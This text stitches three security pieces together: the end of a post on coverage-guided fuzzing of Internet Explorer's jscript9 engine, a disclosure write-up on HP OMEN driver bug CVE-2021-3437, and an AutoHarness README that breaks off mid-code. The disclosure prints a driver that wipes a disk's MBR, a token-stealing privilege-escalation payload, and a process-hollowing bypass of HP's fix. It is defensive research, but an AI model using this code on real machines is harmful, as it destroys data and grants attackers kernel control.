Another feature that didn’t make it to Swift for Windows is statically linking libraries. This means that all libraries (such as those written in C and C++ that the user wants to include in their Swift project) need to be dynamically linked. This goes for libraries already included in the Fuzzilli project, but also for TinyInst. Since TinyInst also uses the CMake build system, my first attempt at integrating TinyInst was to include it via the Fuzzilli CMake project, and simply have it built as a shared library. However, the same tooling that was successful in building Fuzzilli would fail to build TinyInst (probably due to various platform libraries TinyInst uses). That’s why, in the end, TinyInst was being built separately into a .dll and this .dll loaded “manually” into Fuzzilli via the LoadLibrary API. This turned out not to be so bad - Swift build tooling for Windows was quite slow, and so it was much faster to only build TinyInst when needed, rather than build the entire Fuzzilli project (even when the changes made were minor).

The Linux/macOS parts of Fuzzilli, of course, also needed to be rewritten. Fortunately, it turned out that the parts that needed to be rewritten were the parts written in C, and the parts written in Swift worked as-is (other than a couple of exceptions, mostly related to networking). As someone with no previous experience with Swift, this was quite a relief. The main parts that needed to be rewritten were the networking library (libsocket), the library used to run and monitor the child process (libreprl) and the library for collecting coverage (libcoverage). The latter two were changed to use TinyInst. Since these are separate libraries in Fuzzilli, but TinyInst handles both of these tasks, some plumbing through Swift code was needed to make sure both of these libraries talk to the same TinyInst instance for a given target.

Challenge 2: Threading woes

Another feature that made the integration less straightforward than hoped for was the use of threading in Swift. TinyInst is built on a custom debugger and, on Windows, it uses the Windows debugging API. One specific property of the Windows debugging API, for example WaitForDebugEvent, is that it does not take a debuggee pid or a process handle as an argument. So then, the question is, if you have multiple debuggees, to which of them does the API call refer? The answer is that, when a debugger on Windows attaches to a debuggee (or starts a debuggee process), the thread that started/attached it is the debugger. Any subsequent calls for that particular debuggee need to be issued on that same thread.

In contrast, the preferred Swift coding style (that Fuzzilli also uses) is to take advantage of threading primitives such as DispatchQueue. When tasks get posted on a DispatchQueue, they can run in parallel on “background” threads. However, with the background threads, there is no guarantee that a certain task is always going to run on the same thread. So it would happen that calls to the same TinyInst instance happened from different threads, thus breaking the Windows debugging model. This is why, for the purposes of this project, TinyInst was modified to create its own thread (one for each target process) and ensure that any debugger calls for a particular child process always happen on that thread.
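
A minimal Win32 debug loop makes the constraint clear. The sketch below is plain C, not TinyInst's actual code; it shows the per-target debugger thread pattern described above, where the thread that creates the debuggee is the only one that may service its debug events.

#include <windows.h>

/* Per-target debugger thread: the thread that creates the debuggee is the
   only thread allowed to service its debug events. */
DWORD WINAPI DebuggerThread(LPVOID param)
{
    char *cmdline = (char *)param;
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi;

    if (!CreateProcessA(NULL, cmdline, NULL, NULL, FALSE,
                        DEBUG_ONLY_THIS_PROCESS, NULL, NULL, &si, &pi))
        return 1;

    for (;;) {
        DEBUG_EVENT ev;
        /* Note: no pid or handle argument; the call implicitly refers to the
           debuggees attached from this thread. */
        if (!WaitForDebugEvent(&ev, INFINITE))
            break;
        if (ev.dwDebugEventCode == EXIT_PROCESS_DEBUG_EVENT) {
            ContinueDebugEvent(ev.dwProcessId, ev.dwThreadId, DBG_CONTINUE);
            break;
        }
        /* Breakpoint handling, coverage collection, etc. would go here. */
        ContinueDebugEvent(ev.dwProcessId, ev.dwThreadId, DBG_CONTINUE);
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}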

Various minor changes

Some examples of features Fuzzilli requires that needed to be added to TinyInst are stdin/stdout redirection and a channel for reading out the “status” of JavaScript execution (specifically, to be able to tell if JavaScript code was throwing an exception or executing successfully). Some of these features were already integrated into the “mainline” TinyInst or will be integrated in the future.

After all of that was completed, though, the Fuzzilli/TinyInst hybrid was running in a stable manner.

Note that the coverage percentage reported by Fuzzilli is incorrect. Because TinyInst is a dynamic instrumentation library, it cannot know the number of basic blocks/edges in advance.

Primarily because of the current Swift on Windows issues, this closed-source mode of Fuzzilli is not something we want to officially support. However, the sources and the build we used can be downloaded here.

Approach 2: Grammar-based mutation fuzzing with Jackalope

Jackalope is a coverage-guided fuzzer I developed for fuzzing black-box binaries on Windows and, recently, macOS. Jackalope initially included mutators suitable for fuzzing of binary formats. However, a key feature of Jackalope is modularity: it is meant to be easy to plug in or replace individual components, including, but not limited to, sample mutators.

After observing how Fuzzilli works more closely during Approach 1, as well as observing samples it generated and the bugs it found, the idea was to extend Jackalope to allow mutational JavaScript fuzzing, but also in the future, mutational fuzzing of other targets whose samples can be described by a context-free grammar.

Jackalope uses a grammar syntax similar to that of Domato, but somewhat simplified (with some features not supported at this time). This grammar format is easy to write and easy to modify (but also easy to parse). The grammar syntax, as well as the list of builtin symbols, can be found on this page and the JavaScript grammar used in this project can be found here.

One addition to the Domato grammar syntax that allows for more natural mutations, as well as sample minimization, is the <repeat_*> grammar node. A <repeat_x> symbol tells the grammar engine that it can be represented as zero or more <x> nodes. For example, in our JavaScript grammar, we have

<statementlist> = <repeat_statement>

telling the grammar engine that <statementlist> can be constructed by concatenating zero or more <statement>s. In our JavaScript grammar, a <statement> expands to an actual JavaScript statement. This helps the mutation engine in the following way: it now knows it can mutate a sample by inserting another <statement> node anywhere in the <statementlist> node. It can also remove <statement> nodes from the <statementlist> node. Both of these operations will keep the sample valid (in the grammar sense).

It’s not mandatory to have <repeat_*> nodes in the grammar, as the mutation engine knows how to mutate other nodes as well (see the list of mutations below). However, including them where it makes sense might help make mutations in a more natural way, as is the case of the JavaScript grammar.

Internally, grammar-based mutation works by keeping a tree representation of the sample instead of representing the sample just as an array of bytes (Jackalope must in fact represent a grammar sample as a sequence of bytes at some points in time, e.g. when storing it to disk, but does so by serializing the tree and deserializing it when needed). Mutations work by modifying a part of the tree in a manner that ensures the resulting tree is still valid within the context of the input grammar. Minimization works by removing those nodes that are determined to be unnecessary.
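
As a rough illustration of that representation, the following sketch shows a hypothetical node layout, not Jackalope's actual classes: a sample is a tree of symbol nodes, and serialization simply walks the tree and emits the terminal text.

#include <stdlib.h>

/* Hypothetical tree representation of a grammar sample. A node is either a
   terminal (literal text) or a nonterminal whose children expand according
   to the grammar rules. */
typedef struct GrammarNode {
    int symbol_id;                 /* index into the grammar's symbol table */
    const char *text;              /* terminal text, NULL for nonterminals  */
    struct GrammarNode **children; /* ordered children of a nonterminal     */
    size_t num_children;
} GrammarNode;

/* Serialization walks the tree and emits terminal text in order; mutations
   operate on the tree itself, so the result stays valid with respect to the
   grammar. */
static void SerializeNode(const GrammarNode *node, void (*emit)(const char *))
{
    if (node->text) {
        emit(node->text);
        return;
    }
    for (size_t i = 0; i < node->num_children; i++)
        SerializeNode(node->children[i], emit);
}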

Jackalope’s mutation engine can currently perform the following operations on the tree:

  • Generate a new tree from scratch. This is not really a mutation and is mainly used to bootstrap the fuzzers when no input samples are provided. In fact, grammar fuzzing mode in Jackalope must either start with an empty corpus or a corpus generated by a previous session. This is because there is currently no way to parse a text file (e.g. a JavaScript source file) into its grammar tree representation (in general, there is no guaranteed unique way to parse a sample with a context-free grammar).
  • Select a random node in the sample's tree representation. Generate just this node anew while keeping the rest of the tree unchanged.
  • Splice: Select a random node from the current sample and a node with the same symbol from another sample. Replace the node in the current sample with a node from the other sample.
  • Repeat node mutation: One or more new children get added to a <repeat_*> node, or some of the existing children get replaced.
  • Repeat splice: Selects a <repeat_*> node from the current sample and a similar <repeat_*> node from another sample. Mixes children from the other node into the current node.

The JavaScript grammar was initially constructed by following the ECMAScript 2022 specification. However, as is always the case when constructing fuzzing grammars from specifications or in a (semi-)automated way, this grammar was only a starting point. More manual work was needed to make the grammar output valid and to generate interesting samples more frequently.

Jackalope now supports grammar fuzzing out-of-the box, and, in order to use it, you just need to add -grammar <path_to_grammar_file> to Jackalope’s command lines. In addition to running against closed-source targets on Windows and macOS, Jackalope can now run against open-source targets on Linux using Sanitizer Coverage based instrumentation. This is to allow experimentation with grammar-based mutation fuzzing on open-source software.

The following image shows Jackalope running against jscript9.


Results

I ran Fuzzilli for several weeks on 100 cores. This resulted in finding two vulnerabilities, CVE-2021-26419 and CVE-2021-31959. Note that the bugs that were analyzed and determined not to have security impact are not counted here. Both of the vulnerabilities found were in the bytecode generator, a part of the JavaScript engine that is typically not very well tested by generation-based fuzzing approaches. Both of these bugs were found relatively early in the fuzzing process and would be findable even by fuzzing on a single machine.

The second of the two bugs was particularly interesting because it initially manifested only as a NULL pointer dereference that happened occasionally, and it took quite a bit of effort (including tracing JavaScript interpreter execution in cases where it crashed and in cases where it didn’t to see where the execution flow diverges) to reach the root cause. Time travel debugging was also useful here - it would be quite difficult if not impossible to analyze the sample without it. The reader is referred to the vulnerability report for further details about the issue.

Jackalope was run on a similar setup: for several weeks on 100 cores. Interestingly, at least against jscript9, Jackalope with grammar-based mutations behaved quite similarly to Fuzzilli: it was hitting a similar level of coverage and finding similar bugs. It also found CVE-2021-26419 quickly into the fuzzing process. Of course, it’s easy to re-discover bugs once they have already been found with another tool, but neither the grammar engine nor the JavaScript grammar contain anything specifically meant for finding these bugs.

About a week and a half into fuzzing with Jackalope, it triggered a bug I hadn't seen before, CVE-2021-34480. This time, the bug was in the JIT compiler, which is another component not exercised very well with generation-based approaches. I was quite happy with this find, because it validated the feasibility of a grammar-based approach for finding JIT bugs.

Limitations and improvement ideas

While successful coverage-guided fuzzing of closed-source JavaScript engines is certainly possible, as demonstrated above, it does have its limitations. The biggest one is the inability to compile the target with additional debug checks. Most modern open-source JavaScript engines include additional checks that can be compiled in if needed and enable catching certain types of bugs more easily, without requiring that the bug crashes the target process. If the jscript9 source code includes such checks, they are lost in the release build we fuzzed.

Related to this, we also can’t compile the target with something like Address Sanitizer. The usual workaround for this on Windows would be to enable Page Heap for the target. However, it does not work well here. The reason is, jscript9 uses a custom allocator for JavaScript objects. As Page Heap works by replacing the default malloc(), it simply does not apply here.

A way to get around this would be to use instrumentation (TinyInst is already a general-purpose instrumentation library so it could be used for this in addition to code coverage) to instrument the allocator and either insert additional checks or replace it completely. However, doing this was out-of-scope for this project.

Conclusion

Coverage-guided fuzzing of closed-source targets, even complex ones such as JavaScript engines, is certainly possible, and there are plenty of tools and approaches available to accomplish this.

In the context of this project, the Jackalope fuzzer was extended to allow grammar-based mutation fuzzing. These extensions have the potential to be useful beyond just JavaScript fuzzing and can be adapted to other targets by simply using a different input grammar. It would be interesting to see which other targets the broader community thinks would benefit from a mutation-based grammar fuzzing approach.

Finally, despite being targeted by security researchers for a long time now, Internet Explorer still has many exploitable bugs that can be found even without large resources. After the development on this project was complete, Microsoft announced that they will be removing Internet Explorer as a separate browser. This is a good first step, but with Internet Explorer (or Internet Explorer engine) integrated into various other products (most notably, Microsoft Office, as also exploited by in-the-wild attackers), I wonder how long it will truly take before attackers stop abusing it.

CVE-2021-3437 | HP OMEN Gaming Hub Privilege Escalation Bug Hits Millions of Gaming Devices

Executive Summary

  • SentinelLabs has discovered a high severity flaw in an HP OMEN driver affecting millions of devices worldwide.
  • Attackers could exploit these vulnerabilities to locally escalate to kernel-mode privileges. With this level of access, attackers can disable security products, overwrite system components, corrupt the OS, or perform any malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to HP on Feb 17, 2021, and the vulnerability is tracked as CVE-2021-3437 with a CVSS score of 7.8.
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Introduction

HP OMEN Gaming Hub, previously known as HP OMEN Command Center, is a software product that comes preinstalled on HP OMEN desktops and laptops. This software can be used to control and optimize settings such as device GPU, fan speeds, CPU overclocking, memory and more. The same software is used to set and adjust lighting and other controls on gaming devices and accessories such as mouse and keyboard.

Following on from our previous research into other HP products, we discovered that this software utilizes a driver that contains vulnerabilities that could allow malicious actors to achieve a privilege escalation to kernel mode without needing administrator privileges.

CVE-2021-3437 essentially derives from the HP OMEN Gaming Hub software using vulnerable code partially copied from an open source driver. In this research paper, we present details explaining how the vulnerability occurs and how it can be mitigated. We suggest best practices for developers that would help reduce the attack surface provided by device drivers with IOCTL handlers exposed to low-privileged users.

Technical Details

Under the hood of HP OMEN Gaming Hub lies the HpPortIox64.sys driver, C:\Windows\System32\drivers\HpPortIox64.sys. This driver is developed by HP as part of OMEN, but it is actually a partial copy of another problematic driver, WinRing0.sys, developed by OpenLibSys.

The link between the two drivers can readily be seen: on some signed HP versions, the metadata information shows the original filename and product name:

File Version information from CFF Explorer

Unfortunately, issues with the WinRing0.sys driver are well known. This driver enables user-mode applications to perform various privileged kernel-mode operations via an IOCTL interface.

The operations provided by the HpPortIox64.sys driver include read/write kernel memory, read/write PCI configurations, read/write IO ports, and MSRs. Developers may find it convenient to expose a generic interface of privileged operations to user mode for stability reasons, keeping as much code as possible out of the kernel module.

The IOCTL codes 0x9C4060CC, 0x9C4060D0, 0x9C4060D4, 0x9C40A0D8, 0x9C40A0DC and 0x9C40A0E0 allow user mode applications with low privileges to read/write 1/2/4 bytes to or from an IO port. This could be leveraged in several ways to ultimately run code with elevated privileges in a manner we have previously described here.
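
To illustrate how a low-privileged process would reach these handlers, below is a minimal, hypothetical sketch that opens the device and issues one of the port-read IOCTLs via DeviceIoControl. The device name \\.\HpPortIO appears later in this post; the layout of the request buffer expected by the driver is an assumption made purely for illustration.

#include <windows.h>
#include <stdio.h>

// Hypothetical request layout for the port I/O IOCTLs; the real structure
// used by HpPortIox64.sys may differ.
typedef struct _PORT_IO_REQUEST {
    USHORT Port;   // I/O port number
    ULONG  Value;  // value to write (ignored for reads)
} PORT_IO_REQUEST;

int wmain(void) {
    HANDLE hDevice = CreateFileW(L"\\\\.\\HpPortIO", GENERIC_READ | GENERIC_WRITE,
                                 FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                                 OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("open failed: %lu\n", GetLastError());
        return 1;
    }

    PORT_IO_REQUEST req = { 0x1F7, 0 };   // e.g. the ATA status port used later in this post
    ULONG result = 0, returned = 0;

    // 0x9C4060CC is one of the port-read IOCTL codes listed above.
    if (DeviceIoControl(hDevice, 0x9C4060CC, &req, sizeof(req),
                        &result, sizeof(result), &returned, NULL)) {
        printf("port 0x%hx -> 0x%lx\n", req.Port, result);
    }

    CloseHandle(hDevice);
    return 0;
}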

The following image highlights the vulnerable code that allows unauthorized access to IN/OUT instructions, with IN instructions marked in red and OUT instructions marked in blue:

The Vulnerable Code – unauthorized access to IN/OUT instructions

Since I/O privilege level (IOPL) equals the current privilege level (CPL), it is possible to interact with peripheral devices such as internal storage and GPU to either read/write directly to the disk or to invoke Direct Memory Access (DMA) operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process.

For the purposes of illustration, we wrote this sample driver to demonstrate the attack without pursuing an actual exploit:

#include <ntddk.h>
#include <intrin.h>

unsigned char port_byte_in(unsigned short port) {
	return __inbyte(port);
}

void port_byte_out(unsigned short port, unsigned char data) {
	__outbyte(port, data);
}

void port_long_out(unsigned short port, unsigned long data) {
	__outdword(port, data);
}

unsigned short port_word_in(unsigned short port) {
	return __inword(port);
}

#define BASE 0x1F0          // primary ATA channel I/O port base

// Standard ATA status register bits (values as in the LearnOS code this is based on)
#define STATUS_BSY 0x80
#define STATUS_RDY 0x40

static void ATA_wait_BSY();
static void ATA_wait_DRQ();

void read_sectors_ATA_PIO(unsigned long LBA, unsigned char sector_count) {
	ATA_wait_BSY();
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x20); //Send the read command


	for (int j = 0; j < sector_count; j++) {
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) {
			USHORT a = port_word_in(BASE);
			DbgPrint("0x%x, ", a);
		}
	}
}

void write_sectors_ATA_PIO(unsigned long LBA, unsigned char sector_count) {
	ATA_wait_BSY();
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x30);

	for (int j = 0; j < sector_count; j++)
	{
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) {
			port_long_out(BASE, 0xffffffff);
		}
	}
}

static void ATA_wait_BSY() // Wait for BSY to be 0
{
	while (port_byte_in(BASE + 7) & STATUS_BSY);
}

static void ATA_wait_DRQ() // Wait for RDY to be set
{
	while (!(port_byte_in(BASE + 7) & STATUS_RDY));
}

static void drv_unload(PDRIVER_OBJECT driver_object) // minimal unload routine (not shown in the original listing)
{
	UNREFERENCED_PARAMETER(driver_object);
}

NTSTATUS DriverEntry(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry)
{
	UNREFERENCED_PARAMETER(registry);
	driver_object->DriverUnload = drv_unload;

	DbgPrint("Before: \n");
	read_sectors_ATA_PIO(0, 1);
	write_sectors_ATA_PIO(0, 1);
	
	DbgPrint("\nAfter: \n");
	read_sectors_ATA_PIO(0, 1);

	return STATUS_SUCCESS;
}

This ATA PIO read/write is based on LearnOS. Running this driver will result in the following DebugView prints:

Debug logging from the driver in DbgView utility

Trying to restart this machine will result in an ‘Operating System not found’ error message because our demo driver destroyed the first sector of the disk (the MBR).

The machine fails to boot due to corrupted MBR

It’s worth mentioning that the impact of this vulnerability is platform dependent. It can potentially be used to attack device firmware or perform legacy PCI access by accessing ports 0xCF8/0xCFC. Some laptops may have embedded controllers which are reachable via IO port access.
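
To make the legacy PCI example concrete, the standard configuration mechanism works by writing an address word to port 0xCF8 and then reading the data from port 0xCFC. The kernel-mode sketch below reuses the port helpers from the demo driver above and reads the Vendor/Device ID of bus 0, device 0, function 0; it only illustrates the mechanism and is not HP’s code.

// Read a 32-bit PCI configuration register via the legacy 0xCF8/0xCFC mechanism.
// port_long_out() is the helper from the demo driver above; __indword() is the
// corresponding MSVC intrinsic for a 32-bit port read.
unsigned long pci_config_read(unsigned char bus, unsigned char dev,
                              unsigned char func, unsigned char offset) {
	unsigned long address = 0x80000000UL              // enable bit
	                      | ((unsigned long)bus  << 16)
	                      | ((unsigned long)dev  << 11)
	                      | ((unsigned long)func << 8)
	                      | (offset & 0xFC);          // dword-aligned register offset
	port_long_out(0xCF8, address);                    // select the register
	return __indword(0xCFC);                          // read its value
}

// Example: register 0x00 of bus 0 / device 0 / function 0 holds the Vendor and Device ID.
// unsigned long id = pci_config_read(0, 0, 0, 0x00);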

Another interesting vulnerability in this driver is an arbitrary MSR read/write, accessible via IOCTLs 0x9C402084 and 0x9C402088. Model-Specific Registers (MSRs) are registers for querying or modifying CPU data. RDMSR and WRMSR are used to read from and write to an MSR, respectively. Documentation for WRMSR and RDMSR can be found in the Intel(R) 64 and IA-32 Architectures Software Developer’s Manual, Volume 2, Chapter 5.
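
In kernel mode, reading or writing an MSR boils down to the __readmsr/__writemsr compiler intrinsics, which is effectively what these IOCTLs hand to user mode. A short sketch (0xC0000082 is IA32_LSTAR, the register discussed below):

#include <intrin.h>

// What the MSR IOCTLs effectively expose: arbitrary RDMSR/WRMSR from kernel mode.
unsigned __int64 read_lstar(void) {
	return __readmsr(0xC0000082);            // IA32_LSTAR: the syscall entry point
}

void write_lstar(unsigned __int64 value) {
	__writemsr(0xC0000082, value);           // redirects every subsequent syscall
}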

In the following image, arbitrary MSR read is marked in green, MSR write in blue, and HLT is marked in red (accessible via IOCTL 0x9C402090, which allows executing the instruction in a privileged context).

Vulnerable code with unauthorized access to MSR registers

Most modern systems only use MSR_LSTAR during a system call transition from user-mode to kernel-mode:

MSR_LSTAR MSR register in WinDbg

It should be noted that on 64-bit KPTI enabled systems, LSTAR MSR points to nt!KiSystemCall64Shadow.

The entire transition process looks something like this:

The entire process of transition from the User Mode to Kernel mode

These vulnerabilities may allow malicious actors to execute code in kernel mode very easily, since the transition to kernel-mode is done via an MSR. This is basically an exposed WRMSR instruction (via IOCTL) that gives an attacker an arbitrary pointer overwrite primitive. We can overwrite the LSTAR MSR and achieve a privilege escalation to kernel mode without needing admin privileges to communicate with this device driver.

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACL enforcement (note: some drivers handle access to devices independently in their IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device
The function that handles IOCTLs to write to arbitrary MSRs

Weaponizing this kind of vulnerability is trivial as there’s no need to reinvent anything; we just took the msrexec project and armed it with our code to elevate our privileges.

Our payload to elevate privileges:

	//extern "C" void elevate_privileges(UINT64 pid);
	//DWORD current_process_id = GetCurrentProcessId();
	vdm::msrexec_ctx msrexec(_write_msr);
	msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void
	{
		const auto dbg_print = reinterpret_cast(get_kroutine(krnl_base, "DbgPrint"));
		const auto ex_alloc_pool = reinterpret_cast(get_kroutine(krnl_base, "ExAllocatePool"));

		dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
		dbg_print("> cr4 -> 0x%p\n", __readcr4());
		elevate_privileges(current_process_id);
	});

The assembly payload:

elevate_privileges proc
_start:
	push rsi
	mov rsi, rcx                 ; rcx = PID of the process to elevate
	mov rbx, gs:[188h]           ; KPCR.Prcb.CurrentThread
	mov rbx, [rbx + 220h]        ; KTHREAD.ApcState.Process (current EPROCESS)

__findsys:
	mov rbx, [rbx + 448h]        ; EPROCESS.ActiveProcessLinks -> next process
	sub rbx, 448h                ; back to the start of that EPROCESS
	mov rcx, [rbx + 440h]        ; EPROCESS.UniqueProcessId
	cmp rcx, 4                   ; PID 4 = the System process
	jnz __findsys

	mov rax, rbx                 ; rax = System EPROCESS
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]

__findarg:
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, rsi                 ; find the EPROCESS of the target PID
	jnz __findarg

	mov rcx, [rax + 4b8h]        ; System EPROCESS.Token
	and cl, 0f0h                 ; keep the EX_FAST_REF pointer bits, drop the ref count
	mov [rbx + 4b8h], rcx        ; overwrite the target process token

	xor rax, rax
	pop rsi
	ret
elevate_privileges endp

Note that this payload is written specifically for Windows 10 20H2.

Let’s see what it looks like in action.

OMEN Gaming Hub Privilege Escalation

Initially, HP developed a fix that verifies the initiator user-mode applications that communicate with the driver: it opens the nt!_FILE_OBJECT of the calling process’s image, parses its PE, and validates the digital signature, all from kernel mode. While this in itself should be considered unsafe, their implementation (which also introduced several additional vulnerabilities) did not fix the original issue. It is very easy to bypass these mitigations using various techniques such as “Process Hollowing”. Consider the following program as an example:

#include <windows.h>
#include <stdio.h>

int main() {

    HANDLE hDevice;

    puts("Opening a handle to HpPortIO\r\n");

    hDevice = CreateFileW(L"\\\\.\\HpPortIO", FILE_ANY_ACCESS,
                          FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                          OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("failed! getlasterror: %lu\r\n", GetLastError());
        return -1;
    }

    printf("succeeded! handle: %p\r\n", hDevice);

    return 0;
}

Running this program against the fix without Process Hollowing will result in:

    Opening a handle to HpPortIO failed! 
    getlasterror: 87

While running this with Process Hollowing will result in:

    Opening a handle to HpPortIO succeeded! 
    handle: <HANDLE>

It’s worth mentioning that security mechanisms such as PatchGuard and security hypervisors should mitigate this exploit to a certain extent. However, PatchGuard can still be bypassed. Some of the structures/data it protects are MSRs, but since PatchGuard samples these assets only periodically, restoring the original values quickly enough may allow an attacker to bypass it.

Impact

An exploitable kernel driver vulnerability can allow an unprivileged user to escalate to SYSTEM, since the vulnerable driver is locally available to anyone.

This high severity flaw, if exploited, could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.

Impacted products:

  • HP OMEN Gaming Hub prior to version 11.6.3.0 is affected
  • HP OMEN Gaming Hub SDK Package prior to version 1.0.44 is affected

Development Suggestions

To reduce the attack surface provided by device drivers with exposed IOCTL handlers, developers should enforce strong ACLs on device objects, verify user input, and not expose a generic interface to kernel mode operations.
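
For example, rather than creating a device object that any user can open, a driver can apply a restrictive SDDL string at creation time. The sketch below uses IoCreateDeviceSecure with the standard “SYSTEM and Administrators only” SDDL; the device name and class GUID are placeholders, not values from the HP driver.

#include <ntddk.h>
#include <wdmsec.h>    // IoCreateDeviceSecure

// Placeholder device name and class GUID, for illustration only.
DECLARE_CONST_UNICODE_STRING(g_DeviceName, L"\\Device\\ExampleSecureDevice");
DECLARE_CONST_UNICODE_STRING(g_Sddl, L"D:P(A;;GA;;;SY)(A;;GA;;;BA)");   // SYSTEM + Administrators only
static const GUID g_DeviceClassGuid =
    { 0x12345678, 0x1234, 0x1234, { 0x12, 0x34, 0x12, 0x34, 0x12, 0x34, 0x56, 0x78 } };

NTSTATUS CreateSecureDevice(PDRIVER_OBJECT DriverObject, PDEVICE_OBJECT *DeviceObject)
{
	// The ACL is enforced by the I/O manager, so a low-privileged process
	// cannot open a handle to the device even if it knows the name.
	return IoCreateDeviceSecure(DriverObject,
	                            0,                        // no device extension
	                            (PUNICODE_STRING)&g_DeviceName,
	                            FILE_DEVICE_UNKNOWN,
	                            FILE_DEVICE_SECURE_OPEN,
	                            FALSE,                    // not exclusive
	                            &g_Sddl,
	                            &g_DeviceClassGuid,
	                            DeviceObject);
}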

Remediation

HP released a Security Advisory on September 14th to address this vulnerability. We recommend customers, both enterprise and consumer, review the HP Security Advisory for complete remediation details.

Conclusion

This high severity vulnerability affects millions of PCs and users worldwide. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, using any OMEN-branded PC with the vulnerable driver utilized by OMEN Gaming Hub makes the user potentially vulnerable. Therefore, we urge users of OMEN PCs to ensure they take appropriate mitigating measures without delay.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

17, Feb, 2021 – Initial report
17, Feb, 2021 – HP requested more information
14, May, 2021 – HP sent us a fix for validation
16, May, 2021 – SentinelLabs notified HP that the fix was insufficient
07, Jun, 2021 – HP delivered another fix, this time disabling the whole feature
27, Jul, 2021 – HP released an update to the software on the Microsoft Store
14, Sep, 2021 – HP released a security advisory for CVE-2021-3437
14, Sep, 2021 – SentinelLabs’ research published

Autoharness - A Tool That Automatically Creates Fuzzing Harnesses Based On A Library


AutoHarness is a tool that automatically generates fuzzing harnesses for you. This idea stems from a common problem when fuzzing codebases today: large codebases have thousands of functions and pieces of code that can be embedded fairly deep in the library, and it is very hard or sometimes even impossible for smart fuzzers to reach those code paths. Even for large fuzzing projects such as oss-fuzz, there are still parts of the codebase that are not covered by fuzzing. Hence, this program tries to alleviate this problem in some capacity, as well as provide a tool that security researchers can use to initially test a codebase. This program only supports codebases written in C and C++.


Setup/Demonstration

This program utilizes LLVM and Clang for libFuzzer, CodeQL for finding functions, and Python for the general program. It was tested on Ubuntu 20.04 with LLVM 12 and Python 3. Here is the initial setup.

sudo apt-get update;
sudo apt-get install python3 python3-pip llvm-12* clang-12 git;
pip3 install pandas lief;   # subprocess, os, argparse and ast ship with the Python standard library

Follow the installation procedure for Codeql on https://github.com/github/codeql. Make sure to install the CLI tools and the libraries. For my testing, I have stored both the tools and libraries under one folder. Finally, clone this repository or download a release. Here is the program's output after running on nginx with the multiple argument mode set. This is the command I used.

python3 harness.py -L /home/akshat/nginx-1.21.0/objs/ -C /home/akshat/codeql-h/ -M 1 -O /home/akshat/autoharness/ -D nginx -G 1 -Y 1 -F "-I /home/akshat/nginx-1.21.0/objs -I /home/akshat/nginx-1.21.0/src/core -I /home/akshat/nginx-1.21.0/src/event -I /home/akshat/nginx-1.21.0/src/http -I /home/akshat/nginx-1.21.0/src/mail -I /home/akshat/nginx-1.21.0/src/misc -I /home/akshat/nginx-1.21.0/src/os -I /home/akshat/nginx-1.21.0/src/stream -I /home/akshat/nginx-1.21.0/src/os/unix" -X ngx_config.h,ngx_core.h

Results:  

It is definitely possible to raise the success rate by further debugging the compilation, adding more header files, and so on. Note that the nginx project does not have any shared objects after compiling. However, this program has a feature that can convert PIE executables into shared libraries.


Planned Features (in order of progress)

  1. Struct Fuzzing

The current way the program fuzzes functions with multiple arguments is by using a fuzzed data provider (see the sketch after this list). There are some improvements to make in this integration; however, I believe I can incorporate this feature with data structures. A problem I came across when coding this is CodeQL and nested structs: it becomes especially hard without writing multiple queries which vary for every function. In short, this feature needs more work. I was also thinking about a simple solution using protobufs.


  2. Implementation Based Harness Creation

Using CodeQL, it is possible to generate a control flow graph that maps how the parameters of a function are initialized. Using that information, we can create a better harness. Another way is to look for existing uses of the function in the library and use that information to make an educated guess at an implementation of the harness. The problem I currently have with this is generating the control flow graphs with CodeQL.


  3. Parallelized fuzzing/False Positive Detection

I can create a simple program that runs all the harnesses and picks up on any of the common false positives using ASAN. Also, I can create a new interface that runs all the harnesses at once and displays their statistics.
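
To make the fuzzed-data-provider approach from the first planned feature concrete, here is a minimal libFuzzer harness sketch for a made-up multi-argument function. The target_function signature is hypothetical; AutoHarness generates code along these lines rather than this exact harness.

#include <cstdint>
#include <string>
#include <fuzzer/FuzzedDataProvider.h>

// Hypothetical library function with multiple arguments.
extern "C" int target_function(int mode, const uint8_t *buf, size_t len);

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    FuzzedDataProvider fdp(data, size);

    // Carve the single fuzz input into one value per argument.
    int mode = fdp.ConsumeIntegral<int>();
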